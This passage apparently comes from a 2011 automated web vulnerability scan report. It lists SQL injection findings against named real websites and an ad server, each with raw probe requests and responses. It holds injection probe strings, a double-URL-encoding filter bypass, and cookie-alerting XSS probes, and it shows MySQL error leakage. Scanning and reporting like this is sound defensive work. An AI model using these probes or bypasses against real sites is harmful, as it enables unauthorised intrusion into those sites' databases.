href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BTHHnm6dOTbqFD4yGlgfFoMSFCe3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtzjS3LqvtxHXPNaIwJ9eTNc2wsz4Q\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});

Request 2

GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d2--%20 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tipd.com/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 13:52:28 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3045

GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\
...[SNIP]...
= c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; sv=String.fromCharCode(55,57,49,54,57,53,56,57,53); sv=sv.slice(1,5); jca=(-4875)+parseInt(sv); if (a=='aw0') {jca+=(2350);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BdkO2nKdOTaGyEur7lQfYuJSaA-3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtwm2_nbgUzu0V6hHIJj95ks7G-P4A\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});

1.9. http://redacted/FXM/iview/211419853/direct [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redacted
Path:   /FXM/iview/211419853/direct

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6126
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 06 Feb 2011 16:31:57 GMT

<html><head><title>010016_125x125</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 240
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 06 Feb 2011 16:31:57 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/152669141/211419853/direct;wi.125;hi.125/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.redcated/b/FX
...[SNIP]...

1.10. http://www.baysideeyes.com.au/aboutus.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /aboutus.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aboutus.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:47 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aboutus.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /aboutus.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:47 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.11. http://www.baysideeyes.com.au/aboutus.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /aboutus.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aboutus.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:34 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /aboutus.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:37 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.12. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin'/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:16 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin''/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:16 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.13. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads'/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads''/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.14. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/BLEPHARITIS.pdf'&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/BLEPHARITIS.pdf''&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:18 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.15. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:12 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:13 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.16. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin'/uploads/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:19 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin''/uploads/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:20 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.17. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads'/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads''/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:24 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.18. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

